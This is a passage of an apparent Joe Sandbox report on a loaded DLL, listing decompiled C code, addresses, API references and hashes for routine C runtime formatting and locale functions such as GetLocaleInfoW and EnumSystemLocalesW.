																		__eflags = _t192 - 0xffffffff;
																		if(_t192 == 0xffffffff) {
																			goto L103;
																		}
																		_t179 = _t179 + 1;
																		__eflags = _t179 - _t218;
																		if(_t179 < _t218) {
																			continue;
																		}
																		goto L103;
																	}
																	goto L103;
																}
																__eflags =  *((intOrPtr*)(_t218 + 0x34)) - _t179;
																if( *((intOrPtr*)(_t218 + 0x34)) <= _t179) {
																	goto L91;
																}
																_t194 =  *(_t218 + 0x30);
																_v20 = _t179;
																while(1) {
																	_v24 = _t179;
																	_v32 =  &(_t194[1]);
																	_t145 = E6DA65341(_t208,  &_v24,  &_v16, 6,  *_t194 & 0x0000ffff,  *((intOrPtr*)(_t218 + 8)));
																	_t221 = _t221 + 0x14;
																	__eflags = _t145;
																	if(_t145 != 0) {
																		break;
																	}
																	__eflags = _v24 - _t145;
																	if(_v24 == _t145) {
																		break;
																	}
																	_push( *((intOrPtr*)(_t218 + 8)));
																	E6DA5F907(_t218 + 0x448,  &_v16, _v24, _t216);
																	_t194 = _v32;
																	_t149 = _v20 + 1;
																	_v20 = _t149;
																	__eflags = _t149 -  *((intOrPtr*)(_t218 + 0x34));
																	if(_t149 !=  *((intOrPtr*)(_t218 + 0x34))) {
																		continue;
																	}
																	goto L92;
																}
																 *_t216 =  *_t216 | 0xffffffff;
																goto L92;
															}
															_t197 = _t190 >> 2;
															__eflags = _t197 & 0x00000001;
															if((_t197 & 0x00000001) != 0) {
																goto L83;
															}
															_t198 = _v36;
															_v20 = _t179;
															__eflags = _t198;
															if(_t198 <= 0) {
																goto L83;
															}
															_t214 =  *_t216;
															_t219 = _v28;
															while(1) {
																_t150 =  *_t219;
																_v24 = _t150;
																_t180 = _t150;
																__eflags =  *((intOrPtr*)(_t150 + 8)) -  *((intOrPtr*)(_t180 + 4));
																if( *((intOrPtr*)(_t150 + 8)) !=  *((intOrPtr*)(_t180 + 4))) {
																	 *_t216 = _t214 + 1;
																	 *((intOrPtr*)(_t180 + 8)) =  *((intOrPtr*)(_t180 + 8)) + 1;
																	 *( *( *_t219)) = 0x30;
																	_t156 =  *_t219;
																	 *_t156 =  *_t156 + 1;
																	__eflags =  *_t156;
																	_t208 =  *_t216;
																} else {
																	_t159 = _t180;
																	__eflags =  *((char*)(_t159 + 0xc));
																	if( *((char*)(_t159 + 0xc)) == 0) {
																		_t208 = _t208 | 0xffffffff;
																		__eflags = _t208;
																	} else {
																		_t208 = _t208 + 1;
																	}
																	 *_t216 = _t208;
																}
																__eflags = _t208 - 0xffffffff;
																if(_t208 == 0xffffffff) {
																	break;
																}
																_t158 = _v20 + 1;
																_v20 = _t158;
																__eflags = _t158 - _t198;
																if(_t158 < _t198) {
																	continue;
																}
																break;
															}
															_t218 = _v32;
															_t179 = 0;
															__eflags = 0;
															goto L83;
														}
														__eflags = _t208;
														if(_t208 <= 0) {
															goto L70;
														}
														_t217 =  *(_t218 + 0x14);
														_t199 = _t179;
														while(1) {
															_t160 =  *(_t218 + 0x448);
															_t181 =  *(_t218 + 0x448);
															__eflags = _t160[2] - _t181[1];
															if(_t160[2] != _t181[1]) {
																 *(_t218 + 0x14) = _t217 + 1;
																_t181[2] = _t181[2] + 1;
																 *( *( *(_t218 + 0x448))) = 0x20;
																_t166 =  *(_t218 + 0x448);
																 *_t166 =  *_t166 + 1;
																__eflags =  *_t166;
																_t217 =  *(_t218 + 0x14);
															} else {
																__eflags = _t181[3];
																if(_t181[3] == 0) {
																	_t217 = _t217 | 0xffffffff;
																	__eflags = _t217;
																} else {
																	_t217 = _t217 + 1;
																}
																 *(_t218 + 0x14) = _t217;
															}
															__eflags = _t217 - 0xffffffff;
															if(_t217 == 0xffffffff) {
																break;
															}
															_t199 = _t199 + 1;
															__eflags = _t199 - _t208;
															if(_t199 < _t208) {
																continue;
															}
															break;
														}
														_t187 = _v28;
														_t179 = 0;
														__eflags = 0;
														goto L70;
													}
													__eflags = _t211 - 0x41;
													if(_t211 == 0x41) {
														goto L56;
													}
													goto L57;
												}
												__eflags = _t127;
												if(_t127 == 0) {
													goto L58;
												}
												goto L53;
											}
											_t127 = _t179;
											__eflags = _t211 - 0x41;
											if(_t211 != 0x41) {
												goto L51;
											}
											goto L50;
										}
										L47:
										goto L48;
									}
									__eflags = _t211 - 0x58;
									if(_t211 != 0x58) {
										goto L47;
									}
									goto L46;
								}
								_t169 =  *(_t218 + 0x1c) >> 6;
								__eflags = 1 & _t169;
								if((1 & _t169) == 0) {
									__eflags =  *(_t218 + 0x1c) & 1;
									if(( *(_t218 + 0x1c) & 1) == 0) {
										_t171 =  *(_t218 + 0x1c) >> 1;
										__eflags = 1 & _t171;
										if((1 & _t171) != 0) {
											_v20 = 0x20;
											_t187 = 1;
											_v28 = 1;
										}
										goto L44;
									}
									_v20 = 0x2b;
									L41:
									_t187 = 1;
									_v28 = 1;
									goto L44;
								}
								_v20 = 0x2d;
								goto L41;
							}
							L11:
							_t120 = 0;
							goto L105;
						}
						_t173 = _t118;
						__eflags = _t173;
						if(__eflags == 0) {
							L28:
							_t119 = E6DA5E41E(_t218, __eflags, _t179);
							goto L10;
						}
						__eflags = _t173 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_t119 = E6DA5E59B(_t218, __eflags);
						goto L10;
					}
					if(__eflags == 0) {
						_t119 = E6DA5F77A(__ecx);
						goto L10;
					}
					__eflags = _t117 - 0x67;
					if(_t117 <= 0x67) {
						L29:
						_t119 = E6DA5F4BA(_t179, _t218);
						goto L10;
					}
					__eflags = _t117 - 0x69;
					if(_t117 == 0x69) {
						L27:
						_t4 = _t218 + 0x1c;
						 *_t4 =  *(_t218 + 0x1c) | 0x00000010;
						__eflags =  *_t4;
						goto L28;
					}
					__eflags = _t117 - 0x6e;
					if(_t117 == 0x6e) {
						_t119 = E6DA5F6D9(__ecx, __edx);
						goto L10;
					}
					__eflags = _t117 - 0x6f;
					if(_t117 != 0x6f) {
						goto L11;
					}
					_t119 = E6DA5F75D(__ecx);
					goto L10;
				}
				if(_t222 == 0) {
					goto L27;
				}
				_t223 = _t117 - _t183;
				if(_t223 > 0) {
					_t175 = _t117 - 0x5a;
					__eflags = _t175;
					if(_t175 == 0) {
						_t119 = E6DA5F460(__ecx);
						goto L10;
					}
					_t176 = _t175 - 7;
					__eflags = _t176;
					if(_t176 == 0) {
						goto L29;
					}
					__eflags = _t176;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t119 = E6DA5F644(_t179, _t218, _t208, __eflags, _t179);
					goto L10;
				}
				if(_t223 == 0) {
					_push(1);
					goto L13;
				}
				if(_t117 == 0x41) {
					goto L29;
				}
				if(_t117 == 0x43) {
					goto L17;
				}
				if(_t117 <= 0x44) {
					goto L11;
				}
				if(_t117 <= 0x47) {
					goto L29;
				}
				if(_t117 != 0x53) {
					goto L11;
				}
				goto L9;
			}

0x6da5f07e
0x6da5f07e
0x6da5f086
0x6da5f08d
0x6da5f092
0x6da5f094
0x6da5f098
0x6da5f09b
0x6da5f09c
0x6da5f0a0
0x6da5f0a3
0x6da5f116
0x6da5f119
0x6da5f169
0x6da5f169
0x6da5f16c
0x6da5f0d2
0x6da5f0d4
0x6da5f0d9
0x6da5f0db
0x6da5f187
0x6da5f18a
0x6da5f3fc
0x6da5f3fc
0x6da5f3fe
0x6da5f40b
0x6da5f40b
0x6da5f195
0x6da5f199
0x6da5f19d
0x6da5f19f
0x6da5f1a2
0x6da5f1a5
0x6da5f1a7
0x6da5f1db
0x6da5f1db
0x6da5f1de
0x6da5f1e1
0x6da5f1e8
0x6da5f1f0
0x6da5f1f2
0x6da5f1f6
0x6da5f1f6
0x6da5f1f9
0x6da5f202
0x6da5f202
0x6da5f204
0x6da5f204
0x6da5f206
0x6da5f20c
0x6da5f20c
0x6da5f211
0x6da5f214
0x6da5f21f
0x6da5f221
0x6da5f222
0x6da5f222
0x6da5f226
0x6da5f226
0x6da5f229
0x6da5f22c
0x6da5f232
0x6da5f234
0x6da5f238
0x6da5f239
0x6da5f23c
0x6da5f29c
0x6da5f29c
0x6da5f29f
0x6da5f2ad
0x6da5f2b3
0x6da5f2b8
0x6da5f2bd
0x6da5f2c0
0x6da5f2c2
0x6da5f328
0x6da5f328
0x6da5f32c
0x6da5f390
0x6da5f390
0x6da5f3a0
0x6da5f3a5
0x6da5f3a5
0x6da5f3a7
0x6da5f3a9
0x6da5f3fb
0x6da5f3fb
0x00000000
0x6da5f3fb
0x6da5f3ae
0x6da5f3b1
0x6da5f3b3
0x00000000
0x00000000
0x6da5f3b5
0x6da5f3b8
0x6da5f3ba
0x00000000
0x00000000
0x00000000
0x00000000
0x6da5f3bc
0x6da5f3bc
0x6da5f3bf
0x6da5f3c4
0x6da5f3c7
0x6da5f3dc
0x6da5f3df
0x6da5f3e1
0x6da5f3e8
0x6da5f3eb
0x6da5f3ed
0x6da5f3ed
0x6da5f3ef
0x6da5f3c9
0x6da5f3c9
0x6da5f3cd
0x6da5f3d2
0x6da5f3d2
0x6da5f3cf
0x6da5f3cf
0x6da5f3cf
0x6da5f3d5
0x6da5f3d5
0x6da5f3f1
0x6da5f3f4
0x00000000
0x00000000
0x6da5f3f6
0x6da5f3f7
0x6da5f3f9
0x00000000
0x00000000
0x00000000
0x6da5f3f9
0x00000000
0x6da5f3bc
0x6da5f32e
0x6da5f331
0x00000000
0x00000000
0x6da5f333
0x6da5f336
0x6da5f339
0x6da5f348
0x6da5f34f
0x6da5f353
0x6da5f358
0x6da5f35b
0x6da5f35d
0x00000000
0x00000000
0x6da5f35f
0x6da5f362
0x00000000
0x00000000
0x6da5f364
0x6da5f375
0x6da5f37d
0x6da5f380
0x6da5f381
0x6da5f384
0x6da5f387
0x00000000
0x00000000
0x00000000
0x6da5f389
0x6da5f38b
0x00000000
0x6da5f38b
0x6da5f2c4
0x6da5f2c7
0x6da5f2ca
0x00000000
0x00000000
0x6da5f2cc
0x6da5f2cf
0x6da5f2d2
0x6da5f2d4
0x00000000
0x00000000
0x6da5f2d6
0x6da5f2d8
0x6da5f2db
0x6da5f2db
0x6da5f2dd
0x6da5f2e0
0x6da5f2e5
0x6da5f2e8
0x6da5f2ff
0x6da5f303
0x6da5f30a
0x6da5f30d
0x6da5f30f
0x6da5f30f
0x6da5f311
0x6da5f2ea
0x6da5f2ea
0x6da5f2ec
0x6da5f2f0
0x6da5f2f5
0x6da5f2f5
0x6da5f2f2
0x6da5f2f2
0x6da5f2f2
0x6da5f2f8
0x6da5f2f8
0x6da5f313
0x6da5f316
0x00000000
0x00000000
0x6da5f31b
0x6da5f31c
0x6da5f31f
0x6da5f321
0x00000000
0x00000000
0x00000000
0x6da5f321
0x6da5f323
0x6da5f326
0x6da5f326
0x00000000
0x6da5f326
0x6da5f23e
0x6da5f240
0x00000000
0x00000000
0x6da5f242
0x6da5f245
0x6da5f247
0x6da5f247
0x6da5f24d
0x6da5f256
0x6da5f259
0x6da5f26f
0x6da5f274
0x6da5f27f
0x6da5f282
0x6da5f288
0x6da5f288
0x6da5f28a
0x6da5f25b
0x6da5f25b
0x6da5f25f
0x6da5f264
0x6da5f264
0x6da5f261
0x6da5f261
0x6da5f261
0x6da5f267
0x6da5f267
0x6da5f28d
0x6da5f290
0x00000000
0x00000000
0x6da5f292
0x6da5f293
0x6da5f295
0x00000000
0x00000000
0x00000000
0x6da5f295
0x6da5f297
0x6da5f29a
0x6da5f29a
0x00000000
0x6da5f29a
0x6da5f216
0x6da5f219
0x00000000
0x00000000
0x00000000
0x6da5f21b
0x6da5f208
0x6da5f20a
0x00000000
0x00000000
0x00000000
0x6da5f20a
0x6da5f1fb
0x6da5f1fd
0x6da5f200
0x00000000
0x00000000
0x00000000
0x6da5f200
0x6da5f1f4
0x00000000
0x6da5f1f4
0x6da5f1e3
0x6da5f1e6
0x00000000
0x00000000
0x00000000
0x6da5f1e6
0x6da5f1ac
0x6da5f1af
0x6da5f1b1
0x6da5f1b9
0x6da5f1bc
0x6da5f1cc
0x6da5f1ce
0x6da5f1d0
0x6da5f1d2
0x6da5f1d6
0x6da5f1d8
0x6da5f1d8
0x00000000
0x6da5f1d0
0x6da5f1be
0x6da5f1c2
0x6da5f1c2
0x6da5f1c4
0x00000000
0x6da5f1c4
0x6da5f1b3
0x00000000
0x6da5f1b3
0x6da5f0e1
0x6da5f0e1
0x00000000
0x6da5f0e1
0x6da5f173
0x6da5f173
0x6da5f176
0x6da5f147
0x6da5f14a
0x00000000
0x6da5f14a
0x6da5f178
0x6da5f17b
0x00000000
0x00000000
0x6da5f181
0x6da5f0ea
0x6da5f0ec
0x00000000
0x6da5f0ec
0x6da5f11b
0x6da5f15f
0x00000000
0x6da5f15f
0x6da5f11d
0x6da5f120
0x6da5f151
0x6da5f153
0x00000000
0x6da5f153
0x6da5f122
0x6da5f125
0x6da5f143
0x6da5f143
0x6da5f143
0x6da5f143
0x00000000
0x6da5f143
0x6da5f127
0x6da5f12a
0x6da5f13c
0x00000000
0x6da5f13c
0x6da5f12c
0x6da5f12f
0x00000000
0x00000000
0x6da5f133
0x00000000
0x6da5f133
0x6da5f0a5
0x00000000
0x00000000
0x6da5f0ab
0x6da5f0ad
0x6da5f0f3
0x6da5f0f3
0x6da5f0f6
0x6da5f10f
0x00000000
0x6da5f10f
0x6da5f0f8
0x6da5f0f8
0x6da5f0fb
0x00000000
0x00000000
0x6da5f0fe
0x6da5f101
0x00000000
0x00000000
0x6da5f103
0x6da5f106
0x00000000
0x6da5f106
0x6da5f0af
0x6da5f0e8
0x00000000
0x6da5f0e8
0x6da5f0b4
0x00000000
0x00000000
0x6da5f0bd
0x00000000
0x00000000
0x6da5f0c2
0x00000000
0x00000000
0x6da5f0c7
0x00000000
0x00000000
0x6da5f0d0
0x00000000
0x00000000
0x00000000

Strings

0, xrefs: 6DA5F20C

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: cd5ff345e804b41c4d7636d34d97fc4f4db882d0accdc62900a975efe8ca1db3
Instruction ID: 64429242a240170b4e76726aeebae29f4038e93b62d6b37b606ea1fc96c9b4c9
Opcode Fuzzy Hash: cd5ff345e804b41c4d7636d34d97fc4f4db882d0accdc62900a975efe8ca1db3
Instruction Fuzzy Hash: 26C10F7860C74B8FDB11CF68C58067EBBB2BB06314F18865DD5A2DB290D734A9E6CB41

Uniqueness

Uniqueness Score: -1.00%

Function 6DA6C614 Relevance: 1.6, APIs: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E6DA6C614(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				short _v248;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t15;
				signed int _t21;
				void* _t23;
				void* _t30;
				void* _t32;
				signed int _t41;
				signed int* _t47;
				int _t49;
				signed int _t50;

				_t46 = __edx;
				_t15 =  *0x6da83014; // 0xa0d58914
				_v8 = _t15 ^ _t50;
				_t48 = _a4;
				_t32 = E6DA62BDC(__ecx, __edx, _a4);
				_t47 =  *(E6DA62BDC(__ecx, __edx, _a4) + 0x34c);
				_t49 = E6DA6C6E9(_t48);
				asm("sbb ecx, ecx");
				_t21 = GetLocaleInfoW(_t49, ( ~( *(_t32 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
				if(_t21 != 0) {
					_t23 = E6DA690B4(_t47, _t49,  *((intOrPtr*)(_t32 + 0x50)),  &_v248);
					_t41 =  *(_t32 + 0x60);
					if(_t23 != 0) {
						if(_t41 == 0 &&  *((intOrPtr*)(_t32 + 0x5c)) != _t41) {
							_t30 = E6DA690B4(_t47, _t49,  *((intOrPtr*)(_t32 + 0x50)),  &_v248);
							if(_t30 == 0) {
								_push(_t47);
								_push(_t30);
								goto L9;
							}
						}
					} else {
						if(_t41 != 0) {
							L10:
							 *_t47 =  *_t47 | 0x00000004;
							_t47[1] = _t49;
							_t47[2] = _t49;
						} else {
							_push(_t47);
							_push(1);
							L9:
							_push(_t49);
							if(E6DA6C843() != 0) {
								goto L10;
							}
						}
					}
					_t27 =  !( *_t47 >> 2) & 0x00000001;
				} else {
					 *_t47 =  *_t47 & _t21;
					_t27 = _t21 + 1;
				}
				return E6DA59B91(_t27, _t32, _v8 ^ _t50, _t46, _t47, _t49);
			}

0x6da6c614
0x6da6c61f
0x6da6c626
0x6da6c62b
0x6da6c634
0x6da6c63c
0x6da6c64b
0x6da6c657
0x6da6c668
0x6da6c670
0x6da6c681
0x6da6c688
0x6da6c68d
0x6da6c69a
0x6da6c6ab
0x6da6c6b4
0x6da6c6b6
0x6da6c6b7
0x00000000
0x6da6c6b7
0x6da6c6b4
0x6da6c68f
0x6da6c691
0x6da6c6c5
0x6da6c6c5
0x6da6c6c8
0x6da6c6cb
0x6da6c693
0x6da6c693
0x6da6c694
0x6da6c6b8
0x6da6c6b8
0x6da6c6c3
0x00000000
0x00000000
0x6da6c6c3
0x6da6c691
0x6da6c6d5
0x6da6c672
0x6da6c672
0x6da6c674
0x6da6c674
0x6da6c6e6

APIs

Part of subcall function 6DA62BDC: GetLastError.KERNEL32(?,00000008,6DA68ED9), ref: 6DA62BE0
Part of subcall function 6DA62BDC: SetLastError.KERNEL32(00000000,?,00000005,000000FF), ref: 6DA62C82

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6DA6C668

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: c8539fd0ce4f6cbce362cac3acd7af4a73fc3ba3d2c32c79f0b9d3e43c04a30f
Instruction ID: 9153ab5d427b48ec05416c8c82d9f37fb8a1214bae0cd6464872ddf4e5c44298
Opcode Fuzzy Hash: c8539fd0ce4f6cbce362cac3acd7af4a73fc3ba3d2c32c79f0b9d3e43c04a30f
Instruction Fuzzy Hash: A621B37A61D247EBEF189F25CD41ABA7BB8EF05314F05607AEF01C6150EB349980DB64

Uniqueness

Uniqueness Score: -1.00%

Function 6DA6C29B Relevance: 1.6, APIs: 1, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E6DA6C29B(void* __ecx, void* __edx, signed int* _a4) {
				void* __esi;
				void* __ebp;
				intOrPtr _t26;
				intOrPtr _t29;
				signed int _t32;
				signed char _t33;
				signed char _t34;
				intOrPtr* _t38;
				intOrPtr* _t41;
				signed int _t47;
				void* _t50;
				void* _t51;
				signed int* _t52;
				void* _t53;
				void* _t54;
				signed int _t62;

				_t54 = E6DA62BDC(__ecx, __edx, _t53);
				_t47 = 2;
				_t38 =  *((intOrPtr*)(_t54 + 0x50));
				_t50 = _t38 + 2;
				do {
					_t26 =  *_t38;
					_t38 = _t38 + _t47;
				} while (_t26 != 0);
				_t41 =  *((intOrPtr*)(_t54 + 0x54));
				 *(_t54 + 0x60) = 0 | _t38 - _t50 >> 0x00000001 == 0x00000003;
				_t51 = _t41 + 2;
				do {
					_t29 =  *_t41;
					_t41 = _t41 + _t47;
				} while (_t29 != 0);
				_t52 = _a4;
				 *(_t54 + 0x64) = 0 | _t41 - _t51 >> 0x00000001 == 0x00000003;
				_t52[1] = 0;
				if( *(_t54 + 0x60) == 0) {
					_t47 = E6DA6C395( *((intOrPtr*)(_t54 + 0x50)));
				}
				 *(_t54 + 0x5c) = _t47;
				_t32 = EnumSystemLocalesW(E6DA6C3C1, 1);
				_t62 =  *_t52 & 0x00000007;
				asm("bt ecx, 0x9");
				_t33 = _t32 & 0xffffff00 | _t62 > 0x00000000;
				asm("bt ecx, 0x8");
				_t34 = _t33 & 0xffffff00 | _t62 > 0x00000000;
				if((_t34 & (_t47 & 0xffffff00 | _t62 != 0x00000000) & _t33) == 0) {
					 *_t52 = 0;
					return _t34;
				}
				return _t34;
			}

0x6da6c2a8
0x6da6c2ae
0x6da6c2af
0x6da6c2b2
0x6da6c2b5
0x6da6c2b5
0x6da6c2b8
0x6da6c2ba
0x6da6c2c8
0x6da6c2ce
0x6da6c2d1
0x6da6c2d4
0x6da6c2d4
0x6da6c2d7
0x6da6c2d9
0x6da6c2e2
0x6da6c2ed
0x6da6c2f0
0x6da6c2f6
0x6da6c301
0x6da6c301
0x6da6c30a
0x6da6c30d
0x6da6c315
0x6da6c31b
0x6da6c31f
0x6da6c324
0x6da6c328
0x6da6c32d
0x6da6c32f
0x00000000
0x6da6c32f
0x6da6c335

APIs

Part of subcall function 6DA62BDC: GetLastError.KERNEL32(?,00000008,6DA68ED9), ref: 6DA62BE0
Part of subcall function 6DA62BDC: SetLastError.KERNEL32(00000000,?,00000005,000000FF), ref: 6DA62C82

EnumSystemLocalesW.KERNEL32(6DA6C3C1,00000001,00000000,?,-00000050,?,6DA6C9F2,00000000,?,?,?,00000055,?), ref: 6DA6C30D

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: f7807aa98471983f1483308362a80f16c5e98237040cb1135023079a18bc2f23
Instruction ID: b438aad7f6e532ba583ee35927965068f1b2bf5f6f84185014e7a90216929d48
Opcode Fuzzy Hash: f7807aa98471983f1483308362a80f16c5e98237040cb1135023079a18bc2f23
Instruction Fuzzy Hash: 5411E53B2087059FDB189F39C8906BABBA2FF84768B19442DD9868BA40D775B583C750

Uniqueness

Uniqueness Score: -1.00%

Function 6DA6C843 Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E6DA6C843(signed int _a4, intOrPtr _a8) {
				short _v8;
				void* __ecx;
				void* __esi;
				void* __ebp;
				void* _t8;
				void* _t11;
				intOrPtr _t13;
				void* _t15;
				void* _t19;
				void* _t21;
				void* _t23;
				void* _t25;
				signed int _t26;
				intOrPtr* _t28;

				_push(_t15);
				_push(_t25);
				_t8 = E6DA62BDC(_t15, _t21, _t25);
				_t26 = _a4;
				_t23 = _t8;
				if(GetLocaleInfoW(_t26 & 0x000003ff | 0x00000400, 0x20000001,  &_v8, 2) == 0) {
					L7:
					_t11 = 0;
				} else {
					if(_t26 == _v8 || _a8 == 0) {
						L6:
						_t11 = 1;
					} else {
						_t28 =  *((intOrPtr*)(_t23 + 0x50));
						_t19 = _t28 + 2;
						do {
							_t13 =  *_t28;
							_t28 = _t28 + 2;
						} while (_t13 != 0);
						if(E6DA6C395( *((intOrPtr*)(_t23 + 0x50))) == _t28 - _t19 >> 1) {
							goto L7;
						} else {
							goto L6;
						}
					}
				}
				return _t11;
			}

0x6da6c848
0x6da6c849
0x6da6c84b
0x6da6c850
0x6da6c853
0x6da6c877
0x6da6c8ab
0x6da6c8ab
0x6da6c879
0x6da6c87c
0x6da6c8a6
0x6da6c8a8
0x6da6c884
0x6da6c884
0x6da6c887
0x6da6c88a
0x6da6c88a
0x6da6c88d
0x6da6c890
0x6da6c8a4
0x00000000
0x00000000
0x00000000
0x00000000
0x6da6c8a4
0x6da6c87c
0x6da6c8b0

APIs

Part of subcall function 6DA62BDC: GetLastError.KERNEL32(?,00000008,6DA68ED9), ref: 6DA62BE0
Part of subcall function 6DA62BDC: SetLastError.KERNEL32(00000000,?,00000005,000000FF), ref: 6DA62C82

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,6DA6C5DD,00000000,00000000,?), ref: 6DA6C86F

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 0108ac109fb8981ed8bc1993e777693229e38bc0fe393744e59c9dae9b312c01
Instruction ID: dd74f23819b3e425de399f4ab1903f04c57f103144e412ec223eac14fa1bbfa8
Opcode Fuzzy Hash: 0108ac109fb8981ed8bc1993e777693229e38bc0fe393744e59c9dae9b312c01
Instruction Fuzzy Hash: D0F0A936518256EBDF245A65C805BBA7B68EF80B54F054425DD16A3180EB74F9C2C6B0

Uniqueness

Uniqueness Score: -1.00%

Function 6DA6C1A9 Relevance: 1.5, APIs: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E6DA6C1A9(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				short _v248;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t13;
				signed int _t17;
				signed int* _t39;
				int _t41;
				signed int _t42;

				_t38 = __edx;
				_t11 =  *0x6da83014; // 0xa0d58914
				_v8 = _t11 ^ _t42;
				_t40 = _a4;
				_t13 = E6DA62BDC(__ecx, __edx, _a4);
				_t26 = _t13;
				_t39 =  *(E6DA62BDC(__ecx, __edx, _a4) + 0x34c);
				_t41 = E6DA6C6E9(_t40);
				asm("sbb ecx, ecx");
				_t17 = GetLocaleInfoW(_t41, ( ~( *(_t13 + 0x64)) & 0xfffff005) + 0x1002,  &_v248, 0x78);
				if(_t17 != 0) {
					if(E6DA690B4(_t39, _t41,  *((intOrPtr*)(_t26 + 0x54)),  &_v248) == 0 && E6DA6C81E(_t41) != 0) {
						 *_t39 =  *_t39 | 0x00000004;
						_t39[2] = _t41;
						_t39[1] = _t41;
					}
					_t23 =  !( *_t39 >> 2) & 0x00000001;
				} else {
					 *_t39 =  *_t39 & _t17;
					_t23 = _t17 + 1;
				}
				return E6DA59B91(_t23, _t26, _v8 ^ _t42, _t38, _t39, _t41);
			}

0x6da6c1a9
0x6da6c1b4
0x6da6c1bb
0x6da6c1c0
0x6da6c1c4
0x6da6c1c9
0x6da6c1d1
0x6da6c1e0
0x6da6c1ec
0x6da6c1fd
0x6da6c205
0x6da6c21f
0x6da6c22c
0x6da6c22f
0x6da6c232
0x6da6c232
0x6da6c23c
0x6da6c207
0x6da6c207
0x6da6c209
0x6da6c209
0x6da6c24d

APIs

Part of subcall function 6DA62BDC: GetLastError.KERNEL32(?,00000008,6DA68ED9), ref: 6DA62BE0
Part of subcall function 6DA62BDC: SetLastError.KERNEL32(00000000,?,00000005,000000FF), ref: 6DA62C82

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6DA6C1FD

Strings

utf8, xrefs: 6DA6C16C

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
